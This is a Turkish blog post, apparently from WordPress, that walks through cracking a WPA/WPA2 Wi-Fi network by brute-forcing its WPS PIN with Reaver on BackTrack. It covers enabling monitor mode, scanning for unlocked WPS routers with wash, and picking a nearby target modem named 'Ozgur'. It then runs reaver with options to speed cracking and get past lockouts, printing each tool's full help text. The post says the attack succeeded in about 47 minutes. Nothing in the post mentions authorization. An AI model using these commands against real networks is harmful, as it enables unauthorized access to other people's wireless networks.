WPS ile Wireless Hack (WPA-WPA2)

Posted on Updated on

WPS(Wi-Fi Protected Setup) son dönemlerde sıkça kullanılmaya başlayan, modemlere getirilen ek bir özellik. Yeni nesil modemlerin bazılarının üzerinde WPS tuşu ile wireless modeminize bağlanmak mümkün. Fakat WPS’in güvenliği için sekiz haneli bir pin kullanılıyor. Bu da ister istemez güvenlikçilerin iştahını kabartmış.Tactical Network Solutions diye bir ekip/firma Reaver adında bir linux paketi yayınlayarak ; modem şifresini WPS-Pin kod numarasını brute-force ederek çok daha kısa zamanda kırmayı başarmışlar. Daha fazla teknik detay için şuradaki dökümandan faydalanabilirsiniz.

Bu program WPA-WPA2 şifresi denemeden direk WPS pini ile giriş yapıyor. WPS şuan pek yaygın olmadığı için WPS’i desteklemeyen modemler için eski yollardan devam etmek zorunda kalınabilir… Örnek saldırımızı Backtrack üzerinde yapacağız,malzeme listesi önceki yazılarda bulunabilir… Sırayla ilerleyelim ;

Adım 1:

iwconfig

1a


Adım 2:

airmon-ng start wlan0

2a


Adım 3:

apt-get install reaver

3a

Bu adımda reaver’i internetden download ediyoruz.Zaten kuruluysa sıkıntı yok…


Adım 4:

wash -i (monitor) -C

4a

Yukarıda ki kod WPS destekli wireless modemleri göstermektedir. Burada önemli olan seçilecek hedefin ‘WPS Locked’ özelliğinin kapalı olması ve bize en yakın mesafe de olan modemin tercih edilmesi. Bu iki unsuru göz önüne alırsak; bizim hedefimiz: ‘Ozgur’.

Wash ile ilgili daha detaylı kullanım için;

Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

Required Arguments:
 -i, --interface=<iface> Interface to capture packets on
 -f, --file [FILE1 FILE2 FILE3 ...] Read packets from capture files

Optional Arguments:
 -c, --channel=<num> Channel to listen on [auto]
 -o, --out-file=<file> Write data to file
 -n, --probes=<num> Maximum number of probes to send to each AP in scan mode [15]
 -D, --daemonize Daemonize wash
 -C, --ignore-fcs Ignore frame checksum errors
 -5, --5ghz Use 5GHz 802.11 channels
 -s, --scan Use scan mode
 -u, --survey Use survey mode [default]
 -h, --help Show help

Example:
 wash -i mon0

Adım 5:

Bu adımda Reaver’i kullanıyoruz. Kullandığımız komut aşağıdaki gibidir.

reaver -i (monitor) -b (Modem_Mac) -vv --dh-small

ada

60 saniye bekleme hatası alıyorsanız aşağıdaki gibi bir komut işinize yarayabilir;

reaver -i mon0 -b [BSSID] --lock-delay=250

Daha detaylı Reaver komutları için ;

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

Required Arguments:
 -i, --interface=<wlan> Name of the monitor-mode interface to use
 -b, --bssid=<mac> BSSID of the target AP

Optional Arguments:
 -m, --mac=<mac> MAC of the host system
 -e, --essid=<ssid> ESSID of the target AP
 -c, --channel=<channel> Set the 802.11 channel for the interface (implies -f)
 -o, --out-file=<file> Send output to a log file [stdout]
 -s, --session=<file> Restore a previous session file
 -C, --exec=<command> Execute the supplied command upon successful pin recovery
 -D, --daemonize Daemonize reaver
 -a, --auto Auto detect the best advanced options for the target AP
 -f, --fixed Disable channel hopping
 -5, --5ghz Use 5GHz 802.11 channels
 -v, --verbose Display non-critical warnings (-vv for more)
 -q, --quiet Only display critical messages
 -h, --help Show help

Advanced Options:
 -p, --pin=<wps pin> Use the specified 4 or 8 digit WPS pin
 -d, --delay=<seconds> Set the delay between pin attempts [1]
 -l, --lock-delay=<seconds> Set the time to wait if the AP locks WPS pin attempts [60]
 -g, --max-attempts=<num> Quit after num pin attempts
 -x, --fail-wait=<seconds> Set the time to sleep after 10 unexpected failures [0]
 -r, --recurring-delay=<x:y> Sleep for y seconds every x pin attempts
 -t, --timeout=<seconds> Set the receive timeout period [5]
 -T, --m57-timeout=<seconds> Set the M5/M7 timeout period [0.20]
 -A, --no-associate Do not associate with the AP (association must be done by another application)
 -N, --no-nacks Do not send NACK messages when out of order packets are received
 -S, --dh-small Use small DH keys to improve crack speed
 -L, --ignore-locks Ignore locked state reported by the target AP
 -E, --eap-terminate Terminate each WPS session with an EAP FAIL packet
 -n, --nack Target AP always sends a NACK [Auto]
 -w, --win7 Mimic a Windows 7 registrar [False]

Example:
 reaver -i mon0 -b 00:90:4C:C1:AC:21 -vv

Yazdığımız komut ile seçtiğimiz hedefe yönelik saldırı başlatıyoruz…
Yazdığınız komutu özelleştirmek isterseniz; yukarıda ki seçeneklerle birlikte kendinize göre uygun olan fonksiyonları seçebilirsiniz.
6a

Saldırının ilk dakikalarından…Pin’ler deneniyor ve tahmini ilerleme süresi gösteriliyor…Bu adımdan sonra yapılacak tek şey beklemek…
son

Ve yaklaşık 47 dk sonunda sonuç ortada 🙂
Bazı modemlerin default WPS şifrelerini bilmek/hesaplamak mümkün bu sayede süreyi 5 sn’ye kadar düşürebilirsiniz.Bunun için şuradaki yazıya bakabilirsiniz.

Advertisement

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s